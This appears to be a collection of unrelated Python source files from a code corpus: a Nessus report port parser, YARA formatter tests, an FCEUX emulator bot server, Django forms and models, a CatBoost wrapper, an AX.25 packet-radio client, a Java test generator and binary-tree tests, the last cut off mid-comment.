                    if portid in ssl_list:
                        tunnel="ssl"
                    if name == "http" and tunnel == "ssl":
                        name = "https"
                    # Regex must be found in portid or service name
                    if(regexp.search(portid) or regexp.search(name)):
                        if portid not in out_list:
                            print(addr_ipv4+"|"+portid+"|"+name+"|"+tunnel+"|open")
                            out_list.append(portid)
            # Output matching plugin_output sections, labelled per port.
            if args['output'] == "script":
                items=host.getElementsByTagName("ReportItem")
                for item in items:
                    portid=item.getAttribute("port")
                    scripts=item.getElementsByTagName("plugin_output")
                    for script in scripts:
                        if regexp.search(script.toxml()):
                            print("")
                            print("Host-FQDN: " + hostname + ":" + portid)
                            print("Host-Addr: " + addr_ipv4 + ":" + portid)
                            print(script.firstChild.data)
if __name__ == '__main__':
    # Execute main method with the module-level parsed arguments.
    main(args)
| 5,339 | 1,678 |
''' Format Provider Tests '''
from textwrap import dedent
import pytest
from yarals import helpers
from yarals.base import protocol
from yarals.base import errors as ce
# don't care about pylint(protected-access) warnings since these are just tests
# pylint: disable=W0212
@pytest.mark.asyncio
async def test_format(format_options, test_rules, yara_server):
    ''' Ensure a text edit is provided on format with explicit options '''
    expected = dedent("""\
    rule Oneline : test
    {
        strings:
            $a = "test"
        condition:
            $a
    }""")
    target = str(test_rules.joinpath("oneline.yar").resolve())
    params = {
        "textDocument": {"uri": helpers.create_file_uri(target)},
        "position": {"line": 29, "character": 12},
        "options": format_options
    }
    edits = await yara_server.provide_formatting({"params": params}, True)
    assert len(edits) == 1
    assert isinstance(edits[0], protocol.TextEdit)
    assert edits[0].newText == expected
@pytest.mark.asyncio
async def test_format_default_options(test_rules, yara_server):
    ''' Ensure a text edit is provided on format with implicit options '''
    expected = dedent("""\
    rule Oneline : test
    {
        strings:
            $a = "test"
        condition:
            $a
    }""")
    target = str(test_rules.joinpath("oneline.yar").resolve())
    params = {
        "textDocument": {"uri": helpers.create_file_uri(target)},
        "position": {"line": 29, "character": 12}
    }
    edits = await yara_server.provide_formatting({"params": params}, True)
    assert len(edits) == 1
    assert isinstance(edits[0], protocol.TextEdit)
    assert edits[0].newText == expected
@pytest.mark.asyncio
async def test_format_alt_tabsize(test_rules, yara_server):
    ''' Ensure a text edit is provided on format with tabSize set '''
    expected = dedent("""\
    rule Oneline : test
    {
      strings:
        $a = "test"
      condition:
        $a
    }""")
    target = str(test_rules.joinpath("oneline.yar").resolve())
    params = {
        "textDocument": {"uri": helpers.create_file_uri(target)},
        "position": {"line": 29, "character": 12},
        "options": {"tabSize": 2}
    }
    edits = await yara_server.provide_formatting({"params": params}, True)
    assert len(edits) == 1
    assert isinstance(edits[0], protocol.TextEdit)
    assert edits[0].newText == expected
@pytest.mark.asyncio
async def test_format_insert_tabs(test_rules, yara_server):
    ''' Ensure a text edit is provided that uses tabs instead of spaces '''
    expected = dedent("""\
    rule Oneline : test
    {
    \tstrings:
    \t\t$a = "test"
    \tcondition:
    \t\t$a
    }""")
    target = str(test_rules.joinpath("oneline.yar").resolve())
    params = {
        "textDocument": {"uri": helpers.create_file_uri(target)},
        "position": {"line": 29, "character": 12},
        "options": {"insertSpaces": False}
    }
    edits = await yara_server.provide_formatting({"params": params}, True)
    assert len(edits) == 1
    assert isinstance(edits[0], protocol.TextEdit)
    assert edits[0].newText == expected
@pytest.mark.skip(reason="not implemented")
@pytest.mark.asyncio
async def test_format_keep_whitespace(test_rules, yara_server):
    ''' Ensure a text edit is provided with untrimmed whitespace '''
    expected = dedent("""\
    rule Oneline : test
    {
        strings:
            $a = "test"
        condition:
            $a
    }""")
    oneline = str(test_rules.joinpath("oneline.yar").resolve())
    file_uri = helpers.create_file_uri(oneline)
    # spacing should be preserved
    dirty_files = {
        file_uri: expected
    }
    # Fix: removed a duplicate `file_uri = helpers.create_file_uri(oneline)`
    # statement that recomputed the exact same value.
    message = {
        "params": {
            "textDocument": {"uri": file_uri},
            "position": {"line": 29, "character": 12},
            "options": {"trimTrailingWhitespace": False}
        }
    }
    result = await yara_server.provide_formatting(message, True, dirty_files=dirty_files)
    assert len(result) == 1
    edit = result[0]
    assert isinstance(edit, protocol.TextEdit) is True
    assert edit.newText == expected
@pytest.mark.asyncio
async def test_format_insert_newline(test_rules, yara_server):
    ''' Ensure a text edit is provided with an extra newline inserted '''
    expected = dedent("""\
    rule Oneline : test
    {
        strings:
            $a = "test"
        condition:
            $a
    }
    """)
    target = str(test_rules.joinpath("oneline.yar").resolve())
    params = {
        "textDocument": {"uri": helpers.create_file_uri(target)},
        "position": {"line": 29, "character": 12},
        "options": {"insertFinalNewline": True}
    }
    edits = await yara_server.provide_formatting({"params": params}, True)
    assert len(edits) == 1
    assert isinstance(edits[0], protocol.TextEdit)
    assert edits[0].newText == expected
@pytest.mark.asyncio
async def test_format_keep_newlines(test_rules, yara_server):
    ''' Ensure a text edit is provided with extra newlines '''
    expected = dedent("""\
    rule Oneline : test
    {
        strings:
            $a = "test"
        condition:
            $a
    }
    """)
    rule_path = str(test_rules.joinpath("oneline.yar").resolve())
    uri = helpers.create_file_uri(rule_path)
    # The dirty copy carries extra trailing newlines that must survive formatting.
    with open(rule_path) as handle:
        dirty_files = {uri: "%s\n\n\n" % handle.read()}
    request = {
        "params": {
            "textDocument": {"uri": uri},
            "position": {"line": 29, "character": 12},
            "options": {"trimFinalNewlines": False}
        }
    }
    edits = await yara_server.provide_formatting(request, True, dirty_files=dirty_files)
    assert len(edits) == 1
    assert isinstance(edits[0], protocol.TextEdit) is True
    assert edits[0].newText == expected
@pytest.mark.asyncio
@pytest.mark.xfail(reason="package installation issues")
async def test_format_notify_user(test_rules, uninstall_pkg, yara_server):
    ''' Ensure the formatter notifies the user if plyara is not installed '''
    expected_msg = "plyara is not installed. Formatting is disabled"
    rule_path = str(test_rules.joinpath("oneline.yar").resolve())
    request = {
        "params": {
            "textDocument": {"uri": helpers.create_file_uri(rule_path)},
            "position": {"line": 29, "character": 12}
        }
    }
    # With the dependency removed, formatting must fail loudly.
    await uninstall_pkg("plyara")
    with pytest.raises(ce.NoDependencyFound) as excinfo:
        await yara_server.provide_formatting(request, True)
    assert expected_msg == str(excinfo.value)
@pytest.mark.asyncio
async def test_format_no_imports(test_rules, yara_server):
    ''' Ensure imports are removed from provided rules. They should not be affected by formatter '''
    rulefile = str(test_rules.joinpath("code_completion.yara").resolve())
    file_uri = helpers.create_file_uri(rulefile)
    message = {
        "params": {
            "textDocument": {"uri": file_uri},
            "position": {"line": 9, "character": 12}
        }
    }
    result = await yara_server.provide_formatting(message, True)
    assert len(result) == 3
    assert all([isinstance(edit, protocol.TextEdit) for edit in result])
    full_text = "\n".join([edit.newText for edit in result])
    # The formatter must not touch import statements, so none of the returned
    # edits should contain any "import " text at all.
    assert full_text.count("import ") == 0
| 7,889 | 2,478 |
import warnings
import socket
class FCEUXServer:
    '''
    Server class for making NES bots. Uses FCEUX emulator.
    Visit https://www.fceux.com for info. You will also need to
    load client lua script in the emulator.
    '''
    def __init__(self, frame_func, quit_func=None, ip='localhost', port=1234):
        '''
        Parameters
        ----------
        frame_func : function
            This function will be called every frame. The function should
            accept two argument, :code:`server` (reference to this class)
            and :code:`frame` (number of frames executed).
        quit_func : function
            This function will be executed when the server disconnects from
            the emulator
        ip : str
            IP address of the computer.
        port : int
            Port to listen to.
        '''
        # Establish connection with client (blocks until the emulator connects)
        self._serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._serversocket.bind((ip, port))
        self._serversocket.listen(5)
        self._clientsocket, self._address = self._serversocket.accept()
        # This function will be called every frame
        self._on_frame_func = frame_func
        self._on_quit_func = quit_func
        # First message from the client carries the emulator/lua banner
        self._server_info = self.recv() + ' ' + str(self._address)
        self.send('ACK')

    @property
    def info(self):
        '''
        Emulator info and lua version.
        '''
        return self._server_info

    def send(self, msg):
        '''
        Send message to lua code running on the emulator.

        Parameters
        ----------
        msg : str
        '''
        # Idiomatic type check (was: `not type(msg) is str`).
        # quit() terminates the process, so the raise below is effectively
        # unreachable; kept for documentation of intent.
        if not isinstance(msg, str):
            self.quit()
            raise TypeError('Arguments have to be string')
        self._clientsocket.send(bytes(msg + '\n', 'utf-8'))

    def recv(self):
        '''
        Receive message from lua code running on emulator.

        Returns
        -------
        str
            Received message from emulator.
        '''
        return self._clientsocket.recv(4096).decode('utf-8')

    def init_frame(self):
        '''
        Signal server to prep for next frame and returns
        frame count

        Returns
        -------
        int
            Frame count
        '''
        # Receive message from client; an empty read means the peer closed.
        frame_str = self.recv()
        if not frame_str:
            self.quit('Client had quit')
        frame = int(frame_str)
        return frame

    def start(self):
        '''
        Starts the server, waits for emulator to connect.
        Calls :code:`frame_func` every frame after connection
        has been established.
        '''
        try:
            # Keep receiving messages from FCEUX and acknowledge
            while True:
                frame = self.init_frame()
                self._on_frame_func(self, frame)
        except BrokenPipeError:
            self.quit('Client has quit.')
        except KeyboardInterrupt:
            self.quit()

    def frame_advance(self):
        '''
        Move to next frame, should be called at the end of
        :code:`frame_func`.
        '''
        # Send back continue message
        self.send('CONT')

    def get_joypad(self):
        '''
        Returns
        -------
        str
            Joypad button states.
        '''
        self.send('JOYPAD')
        return self.recv()

    def set_joypad(self, up=False, down=False, left=False,
                   right=False, A=False, B=False, start=False, select=False):
        '''
        Set joypad button states.
        '''
        self.send('SETJOYPAD')
        # Same wire format as before: eight space-separated True/False tokens.
        joypad = ' '.join(str(button) for button in
                          (up, down, left, right, A, B, start, select))
        self.send(joypad)

    def read_mem(self, addr, signed=False):
        '''
        Read memory address.

        Parameters
        ----------
        addr : int
            The memory address to read
        signed : bool
            If :code:`True`, returns signed integer

        Returns
        -------
        int
            The byte at the address.
        '''
        self.send('MEM')
        self.send(str(addr))
        unsigned = int(self.recv())
        if signed:
            # Reinterpret the unsigned byte as two's-complement.
            return unsigned - 256 if unsigned > 127 else unsigned
        return unsigned

    def reset(self):
        '''
        Resets the emulator, executes a power cycle.
        '''
        self.send('RES')

    def quit(self, reason=''):
        '''
        Disconnect from emulator.

        Parameters
        ----------
        reason : str
            Reason for quitting.
        '''
        if self._on_quit_func is not None:
            self._on_quit_func()
        self._serversocket.close()
        self._clientsocket.close()
        print(reason)
        print('Server has quit.')
        exit()
if(__name__ == '__main__'):
    # Demo bot: every frame, print the frame number and current joypad state,
    # then let the emulator advance.
    def on_frame(server, frame):
        print(frame)
        print(server.get_joypad())
        server.frame_advance()
    # Blocks until the FCEUX lua client connects, then runs the frame loop.
    server = FCEUXServer(on_frame)
    print(server.info)
    server.start()
| 5,109 | 1,439 |
from django import forms
from .widgets import SpanWidget
class MultiSelectFormField(forms.MultipleChoiceField):
    """ http://djangosnippets.org/snippets/1200/ """
    widget = forms.CheckboxSelectMultiple

    def __init__(self, *args, **kwargs):
        # 0 means "no limit on the number of selected choices".
        self.max_choices = kwargs.pop('max_choices', 0)
        super(MultiSelectFormField, self).__init__(*args, **kwargs)

    def clean(self, value):
        """Validate the selection.

        Deliberately skips the parent's per-choice validation, but enforces
        `required` and the previously-ignored `max_choices` limit.
        """
        if not value and self.required:
            raise forms.ValidationError(self.error_messages['required'])
        # Bug fix: max_choices was stored but never enforced.
        if value and self.max_choices and len(value) > self.max_choices:
            raise forms.ValidationError(
                'You must select a maximum of %d choices.' % self.max_choices)
        return value
class SpanField(forms.Field):
    """
    A field which renders a value wrapped in a <span> tag.
    Requires use of specific form support. (see ReadonlyForm or ReadonlyModelForm)
    """
    def __init__(self, *args, **kwargs):
        # Fall back to SpanWidget unless the caller supplied a widget.
        kwargs.setdefault('widget', SpanWidget)
        super(SpanField, self).__init__(*args, **kwargs)
| 905 | 274 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
author: Ewen Wang
email: wolfgangwong2012@gmail.com
license: Apache License 2.0
"""
import warnings
warnings.filterwarnings('ignore')
import random
random.seed(0)
import time
import json
import pandas as pd
import matplotlib.pyplot as plt
import catboost as cb
class CAT(object):
    """Thin CatBoost wrapper bundling cross-validation, training,
    prediction and reporting over a single pandas DataFrame.

    Parameters
    ----------
    data : pandas.DataFrame
        Full dataset (features plus target/id columns).
    indcol : str
        Identifier column copied into the prediction frame.
    target : str
        Target column name (ignored when predicting=True).
    features : list
        Feature column names.
    features_cat : list
        Categorical feature column names (their NaNs are filled with 'NaN').
    predicting : bool
        True builds a test Pool (self.dtest); False builds a training Pool.
    multi, balanced, gpu, seed : int
        Flags and random seed stored for later use.
    """
    def __init__(self, data, indcol, target, features, features_cat, predicting=False, multi=0, balanced=0, gpu=0, seed=0):
        super(CAT, self).__init__()
        self.data = data
        self.indcol = indcol
        self.features = features
        self.features_cat = features_cat
        self.predicting = predicting
        # CatBoost rejects NaN in categorical columns, so fill them first.
        self.data[self.features_cat] = self.data[self.features_cat].fillna('NaN')
        if self.predicting:
            self.target = None
            self.dtest = cb.Pool(data=self.data[self.features],
                                 cat_features=self.features_cat)
        else:
            self.target = target
            self.dtrain = cb.Pool(data=self.data[self.features],
                                  label=self.data[self.target],
                                  cat_features=self.features_cat)
        self.multi = multi
        self.balanced = balanced
        self.gpu = gpu
        self.seed = seed
        self.params = {}
        self.cvr = pd.DataFrame()
        self.prediction = pd.DataFrame()

    def algorithm(self, iterations=100, early_stopping_rounds=20, nfold=10, type='Classical', loss_function='Logloss', verbose=100, plot=False):
        """Run cross-validation and record the resulting round count.

        Returns
        -------
        int
            Number of CV rounds performed; also stored as self.n_rounds
            for train() to reuse.
        """
        self.params['iterations'] = iterations
        self.params['early_stopping_rounds'] = early_stopping_rounds
        self.params['loss_function'] = loss_function
        self.params['verbose'] = verbose
        # fixed message typo: "performace" -> "performance"
        message = 'cross validation started and will stop if performance did not improve in {} rounds.'.format(early_stopping_rounds)
        print(message)
        self.cvr = cb.cv(dtrain=self.dtrain,
                         params=self.params,
                         nfold=nfold,
                         seed=self.seed,
                         type=type,
                         plot=plot)
        self.n_rounds = self.cvr.shape[0]
        message = 'cross validation done with number of rounds: {}.'.format(self.n_rounds)
        print(message)
        message = 'test {}: {:.3f}'.format(self.params['loss_function'], self.cvr.iloc[-1, 1])
        print(message)
        return self.n_rounds

    def train(self, path_model=None):
        """Fit a CatBoostClassifier (running CV first if needed), optionally
        save it, and store in-sample predictions in self.prediction."""
        try:
            message = 'number of training rounds: %d.' % self.n_rounds
            print(message)
        except AttributeError:
            # algorithm() was never called; run it with default parameters.
            # (fixed message typo: "hpyter" -> "hyper")
            message = 'no hyper parameters assigned and default assigned.'
            print(message)
            self.algorithm()
        print(json.dumps(self.params, indent=4))
        self.bst = cb.CatBoostClassifier(iterations=self.n_rounds)
        self.bst.fit(self.dtrain)
        if path_model is None:
            pass
        else:
            self.bst.save_model(path_model)
            print('model saved in path: %s' % path_model)
        self.prediction[self.indcol] = self.data[self.indcol]
        self.prediction['prob'] = self.bst.predict_proba(self.dtrain)[:, 1]
        self.prediction['pred'] = self.bst.predict(self.dtrain)
        message = 'prediction done.'
        print(message)
        return None

    def predict(self, path_model, path_result=None):
        """Load a saved model, score self.dtest, and optionally write the
        predictions to CSV."""
        self.bst = cb.CatBoostClassifier()
        self.bst.load_model(path_model)
        message = 'model loaded from path: {}'.format(path_model)
        print(message)
        self.prediction[self.indcol] = self.data[self.indcol]
        self.prediction['prob'] = self.bst.predict_proba(self.dtest)[:, 1]
        self.prediction['pred'] = self.bst.predict(self.dtest)
        message = 'prediction done.'
        print(message)
        if path_result is None:
            pass
        else:
            self.prediction.to_csv(path_result, index=False)
            message = 'results saved in path: %s' % path_result
            print(message)
        return None

    def learning_curve(self, figsize=(10, 5)):
        """Plot train/test loss per CV round from the stored CV results."""
        if len(self.cvr) == 0:
            return 'no models trained, no learning curves.'
        plt.figure(figsize=figsize)
        # column 1 is the test metric, column 3 the train metric (cb.cv layout)
        plt.plot(self.cvr[self.cvr.columns[1]], label='test')
        plt.plot(self.cvr[self.cvr.columns[3]], label='train')
        plt.title('learning curve')
        plt.xlabel('number of rounds')
        plt.ylabel(self.params['loss_function'])
        plt.legend(loc='lower right', title='dataset')
        plt.grid()
        plt.show()
        return None

    def report(self):
        """Plot the prediction distribution and the GossipCat visual report.

        Falls back from the installed gossipcat package to a local Report
        module; returns an error string if neither import succeeds.
        """
        try:
            from gossipcat.Report import Visual
        except Exception:
            print('[WARNING] Package GossipCat not installed.')
            try:
                from Report import Visual
            except Exception:
                return '[ERROR] Package Report not installed.'
        test_target = self.data[self.target]
        prob = self.prediction['prob']
        plt.figure(figsize=(6, 5.5))
        self.prediction['prob'].hist(bins=100)
        plt.title('distribution of predictions')
        vis = Visual(test_target=test_target, test_predprob=prob)
        vis.combo()
        self.df_cap = vis.df_cap
        return None
#!/usr/bin/python
import sys
import socket
import asyncio
import select
from hexdump import hexdump
# KISS TNC framing bytes (see the KISS protocol specification).
KISS_FEND = 0xC0  # Frame start/end marker
KISS_FESC = 0xDB  # Escape character
KISS_TFEND = 0xDC  # If after an escape, means there was an 0xC0 in the source message
KISS_TFESC = 0xDD  # If after an escape, means there was an 0xDB in the source message
class kiss_ax25:
    """Minimal AX.25 UI-frame sender/receiver over a KISS TCP connection
    (e.g. Dire Wolf's KISS port on 8001)."""

    def __init__(self, callsign, kiss_tcp_addr="127.0.0.1", kiss_tcp_port=8001):
        # Encode our own address once; True marks it as the final address
        # in the AX.25 header.
        self.callsign = callsign
        self.kiss_addr = kiss_tcp_addr
        self.kiss_port = kiss_tcp_port
        self.src_addr = encode_address(callsign.upper(), True)
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s.connect((self.kiss_addr, self.kiss_port))
        # poll() lets recv() give up after a timeout instead of blocking.
        self.poller = select.poll()
        self.poller.register(self.s, select.POLLIN)

    def send(self, dest_call, message):
        # Send `message` to `dest_call` as one AX.25 UI frame wrapped in KISS.
        dest_addr = encode_address(dest_call.upper(), False)
        c_byte = [0x03]  # This is a UI frame
        pid = [0xF0]  # No protocol
        msg = [ord(c) for c in message]
        packet = dest_addr + self.src_addr + c_byte + pid + msg
        # Escape the packet in case either KISS_FEND or KISS_FESC ended up in our stream
        packet_escaped = []
        for x in packet:
            if x == KISS_FEND:
                packet_escaped += [KISS_FESC, KISS_TFEND]
            elif x == KISS_FESC:
                packet_escaped += [KISS_FESC, KISS_TFESC]
            else:
                packet_escaped += [x]
        # Build the frame that we will send to Dire Wolf and turn it into a string
        kiss_cmd = 0x00  # Two nybbles combined - TNC 0, command 0 (send data)
        kiss_frame = [KISS_FEND, kiss_cmd] + packet_escaped + [KISS_FEND]
        output = bytearray(kiss_frame)
        self.s.send(output)

    def recv(self):
        # Poll up to 500 ms for a frame; returns ("None", "None") on timeout,
        # otherwise (decoded source callsign, payload text).
        recv_data = []
        message = ''
        msg_bit = False
        fdVsEvent = self.poller.poll(500)
        if fdVsEvent == []:
            return "None", "None"
        for descriptor, Event in fdVsEvent:
            recv_byte = self.s.recv(1)
            # NOTE(review): the byte just read is immediately overwritten and
            # discarded here -- looks like a debugging leftover; confirm intended.
            recv_byte = b'\x00'
            # NOTE(review): first comparison is bytes vs int (always unequal),
            # so the loop body always runs at least once before ord() yields ints.
            while recv_byte != KISS_FEND:
                recv_byte = ord(self.s.recv(1))
                # 0xF0 is the AX.25 PID byte; everything after it is payload.
                if recv_byte == 0xF0:
                    msg_bit = True
                if msg_bit:
                    message += chr(recv_byte)
                recv_data.append(recv_byte)
        # Skip the KISS command byte plus the 7-byte destination field and
        # decode the 7-byte source address.
        source = decode_address(recv_data[1 + 7:8 + 7])
        hexdump(''.join(message))
        return source, ''.join(message)

    def kill(self):
        # Stop further reads on the KISS socket (socket object is kept open).
        self.s.shutdown(socket.SHUT_RD)
        # self.s.close()
def recv_kiss():
    """Read one raw KISS frame body from a local TNC (127.0.0.1:8001).

    Discards the first byte read (presumably the opening FEND delimiter --
    confirm against the TNC's framing), then collects bytes until the
    closing 0xC0 FEND.

    Returns
    -------
    list
        The received bytes; KISS escape sequences are NOT unescaped.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("127.0.0.1", 8001))
    print("Receiving")  # fixed typo: was "Recieving"
    recv_data = []
    recv_byte = s.recv(1)  # discard the first byte before the loop
    while True:
        recv_byte = s.recv(1)
        print(recv_byte)
        if recv_byte == b'\xc0':
            # End of transmission
            break
        recv_data += recv_byte
    s.close()
    return recv_data
#Code below here slightly modified from https://thomask.sdf.org/blog/2018/12/15/sending-raw-ax25-python.html
def send_kiss(source_call, dest_call, message):
    """Send `message` from `source_call` to `dest_call` as one AX.25 UI
    frame via a KISS TCP port (Dire Wolf on 127.0.0.1:8001)."""
    # Make a UI frame by concatenating the parts together
    # This is just an array of ints representing bytes at this point
    dest_addr = encode_address(dest_call.upper(), False)
    src_addr = encode_address(source_call.upper(), True)
    c_byte = [0x03]  # This is a UI frame
    pid = [0xF0]  # No protocol
    msg = [ord(c) for c in message]
    packet = dest_addr + src_addr + c_byte + pid + msg
    # Escape the packet in case either KISS_FEND or KISS_FESC ended up in our stream
    packet_escaped = []
    for x in packet:
        if x == KISS_FEND:
            packet_escaped += [KISS_FESC, KISS_TFEND]
        elif x == KISS_FESC:
            packet_escaped += [KISS_FESC, KISS_TFESC]
        else:
            packet_escaped += [x]
    # Build the frame that we will send to Dire Wolf
    kiss_cmd = 0x00  # Two nybbles combined - TNC 0, command 0 (send data)
    kiss_frame = [KISS_FEND, kiss_cmd] + packet_escaped + [KISS_FEND]
    # Bug fix: str(bytearray(...)) yields the text "bytearray(b'...')" on
    # Python 3 and socket.send() rejects str -- send the raw bytes instead,
    # matching kiss_ax25.send().
    output = bytearray(kiss_frame)
    # Connect to Dire Wolf listening on port 8001 on this machine and send the frame
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("127.0.0.1", 8001))
    s.send(output)
    s.close()
# Addresses must be 6 bytes plus the SSID byte, each character shifted left by 1
# If it's the final address in the header, set the low bit to 1
# Ignoring command/response for simple example
def encode_address(s, final):
    """Encode "CALLSIGN[-SSID]" as 7 AX.25 address bytes.

    Each callsign character is shifted left by one bit; the last byte packs
    the SSID. `final` sets the low bit marking the last address in the header.
    """
    if "-" not in s:
        s += "-0"  # no SSID supplied; default to 0
    call, ssid = s.split('-')
    padded = call.ljust(6)  # space-pad short callsigns to 6 characters
    shifted = [ord(ch) << 1 for ch in padded[0:6]]
    last_marker = 0b00000001 if final else 0
    ssid_byte = (int(ssid) << 1) | 0b01100000 | last_marker
    return shifted + [ssid_byte]
def decode_address(s):
    """Decode 7 AX.25 address bytes back into "CALL-SSID" form.

    Callsign characters are stored shifted left by one bit; the SSID lives
    in bits 1-4 of the final byte, so shift right once and mask with 0x0F.
    (Bug fix: the old mask 0b11001110 zeroed out real SSID values.)
    """
    call = [chr(x >> 1) for x in s[0:6]]
    ssid = str((s[6] >> 1) & 0b00001111)
    return ''.join(call) + '-' + ssid
#send_kiss("kn4vhm","km4yhi","hi") | 4,698 | 2,044 |
from django.db import models
from users.models import User, BaseModel
class CommonModel(models.Model):
    """Abstract base adding audit columns (who created / last modified a row).

    Not a database table itself; concrete models inherit these fields.
    """
    # Nullable so rows can exist without an acting user; the per-class
    # related_name avoids reverse-accessor clashes between subclasses.
    created_by = models.ForeignKey(User, null=True, related_name='%(class)s_requests_created',
                                   on_delete=models.CASCADE)
    modified_by = models.ForeignKey(User, null=True, related_name='%(class)s_requests_modified',
                                    on_delete=models.CASCADE)

    class Meta:
        abstract = True
# Create your models here.
class Wall(BaseModel, CommonModel):
    """A wall post with a unique title and free-form content.

    Inherits audit fields from CommonModel and base fields from BaseModel.
    """
    title = models.CharField(max_length=50, unique=True)
    content = models.TextField()

    @property
    def get_total_likes(self):
        # Number of users on the related Like row (reverse one-to-one "likes").
        return self.likes.users.count()

    @property
    def get_total_dis_likes(self):
        # Number of users on the related DisLike row ("dis_likes").
        return self.dis_likes.users.count()

    def __str__(self):
        return self.title

    class Meta:
        # Newest posts first; created_on presumably comes from BaseModel -- confirm.
        ordering = ['-created_on']
class Comment(BaseModel, CommonModel):
    """A comment attached to a Wall post.

    Inherits audit fields from CommonModel and base fields from BaseModel.
    """
    # Nullable/blank FK: a comment row may exist without a wall attached.
    wall = models.ForeignKey(Wall, on_delete=models.CASCADE, blank=True, null=True, related_name="comments")
    comment_content = models.CharField(max_length=200)

    def __str__(self):
        return self.comment_content

    class Meta:
        # Newest comments first.
        ordering = ['-created_on']
class Like(BaseModel):
    """
    Stores which users liked a Wall post (one row per wall).

    :param BaseModel: Base class which has common attribute for the
    application.
    """
    wall = models.OneToOneField(Wall, related_name="likes", on_delete=models.CASCADE)
    users = models.ManyToManyField(User, related_name='requirement_wall_likes', blank=True)

    def __str__(self):
        # Bug fix: the old body read self.comment.comment, but Like has no
        # `comment` attribute (AttributeError). Mirror DisLike.__str__ and
        # show the related wall's title instead.
        return str(self.wall.title)[:30]
class DisLike(BaseModel):
    """
    Stores which users disliked a Wall post (one row per wall).

    :param BaseModel: Base class which has common attribute for the
    application.
    """
    wall = models.OneToOneField(Wall, related_name="dis_likes", on_delete=models.CASCADE)
    users = models.ManyToManyField(User, related_name='requirement_wall_dis_likes', blank=True)

    def __str__(self):
        # Truncate long titles for admin/list display.
        return str(self.wall.title)[:30]
| 2,903 | 823 |
#!/usr/bin/python
import os
import re
import jinja2
def generate_metadata(name, additional_dict=None):
    """Build the (kind name, metadata dict) pair for one fastutil element kind.

    Defaults are derived from the kind name; `additional_dict` overrides them.
    """
    lowered = name.lower()
    metadata = {
        'package': 'it.unimi.dsi.fastutil.%ss' % lowered,
        'primitive': lowered,
        'boxed_class': name,
    }
    if additional_dict:
        metadata.update(additional_dict)
    return name, metadata
# Metadata for every fastutil element kind, keyed by kind name.
# dict() over the (name, metadata) pairs replaces the redundant
# `{k: v for (k, v) in [...]}` comprehension.
kind_metadata = dict([
    generate_metadata('Byte'),
    generate_metadata('Char', {'boxed_class': 'Character'}),
    generate_metadata('Double'),
    generate_metadata('Float'),
    generate_metadata('Int', {'boxed_class': 'Integer'}),
    generate_metadata('Long'),
    generate_metadata('Short'),
    generate_metadata('Object', {'primitive': None, 'boxed_class': 'String'}),
    # This is mostly the same as Object with the difference that equality is checked
    # using "==" instead of equals
    generate_metadata('Reference', {
        'package': 'it.unimi.dsi.fastutil.objects',
        'primitive': None,
        'boxed_class': 'String',
    }),
])
def is_ref(kind):
    """True for the two reference (non-primitive) kinds."""
    return kind in ('Object', 'Reference')
def map_cast(kind, target_kind, suffix):
    """Build a Java map type name, adding <String> generics for reference kinds.

    Generics are only emitted when the target kind is a reference type; a
    reference source kind adds the second type parameter.
    """
    type_name = '%s2%s%s' % (kind, target_kind, suffix)
    boxed = kind_metadata['Object']['boxed_class']
    if is_ref(target_kind):
        if is_ref(kind):
            type_name += '<%s, %s>' % (boxed, boxed)
        else:
            type_name += '<%s>' % boxed
    return type_name
# Templates live next to this script; trim_blocks keeps the generated Java tidy.
script_dir = os.path.dirname(os.path.realpath(__file__))
env = jinja2.Environment(loader=jinja2.FileSystemLoader(script_dir), autoescape=False, trim_blocks=True)
env.globals['map_cast'] = map_cast
test_template = env.get_template('collection_tests.j')
# Render one <Kind>CollectionsTest.java per element kind.
for kind in kind_metadata.keys():
    output = test_template.render(
        kinds=kind_metadata.keys(),
        kind=kind, metadata=kind_metadata[kind], metadatas=kind_metadata)
    # Post-process: splice <String> type parameters onto reference-kind
    # constructors and map casts that the template emits raw.
    output = re.sub(r'(new (?:Object|Reference)\w+?(?:Set|List))(?=\()', r'\1<String>', output)
    output = re.sub(r'\(((?:Object|Reference)2\w+Map)\) ', r'(\1<String>) ', output)
    with open('%sCollectionsTest.java' % kind, 'w') as f:
        f.write(output)
| 2,171 | 701 |
from tests import test_article
from tests import test_source | 60 | 14 |
from random import randint
from BST_version_3 import BinaryTreeNode, BinaryTree
# I have to keep the build of lists under 3,000 total
# my computer starts to freak out about memory at 10,000
# it slows at 3000.
# recursion depth happens on count at 2000 items
def test_set():
    ''' set() grows the tree for new keys; re-setting a key keeps size fixed '''
    oaktree = BinaryTree(50.5)
    for key in range(50):
        oaktree.set(key, 'crunchy leaves')
    assert oaktree._size == 50
    for key in range(50, 100):
        oaktree.set(key, 'acorns')
    assert oaktree._size == 100
    # Overwriting existing keys must not grow the tree.
    for key in range(50):
        oaktree.set(key, 'gypsy moths')
    assert oaktree._size == 100
def test_count():
    ''' count() must always agree with the tree's _size bookkeeping '''
    mapletree = BinaryTree(75.5)
    # Random inserts (with duplicates) should keep count() and _size in sync.
    for _ in range(100):
        mapletree.set(randint(1, 100), 'climbable')
    assert mapletree._size == mapletree.count()
    for _ in range(50):
        mapletree.set(randint(100, 150), 'shade')
    assert mapletree._size == mapletree.count()
    # Deterministic inserts give an exact expected count.
    pinetree = BinaryTree(80.5)
    for key in range(160):
        pinetree.set(key, 'christmas')
    assert pinetree.count() == 160
    pinetree.set(161, 'needles')
    assert pinetree.count() == 161
def test_delete():
    ''' delete() removes keys and keeps count() and _size in agreement '''
    oaktree = BinaryTree(50.5)
    for i in range(0, 50):
        oaktree.set(i, 'crunchy leaves')
    pinetree = BinaryTree(80.5)
    for i in range(0, 160):
        pinetree.set(i, 'christmas')
    oaktree.delete(1)
    assert oaktree.count() == 49
    assert oaktree._size == 49
    oaktree.delete(25)
    assert oaktree.count() == 48
    assert oaktree._size == 48
    # Deleting every key empties the tree completely.
    for i in range(0, 160):
        pinetree.delete(i)
    assert pinetree.count() == 0
    assert pinetree._size == 0
    for i in range(2, 25):
        oaktree.delete(i)
    assert oaktree.count() == 25
    assert oaktree._size == 25
    # Random keys with duplicates filtered out.
    redwood = BinaryTree(11.5)
    redlist = []
    for i in range(0, 40):
        x = randint(0, 40)
        if x not in redlist:
            redlist.append(x)
        redwood.set(x, 'not 40')
    # Bug fix: this used to read `assert redwood.count != 40`, comparing the
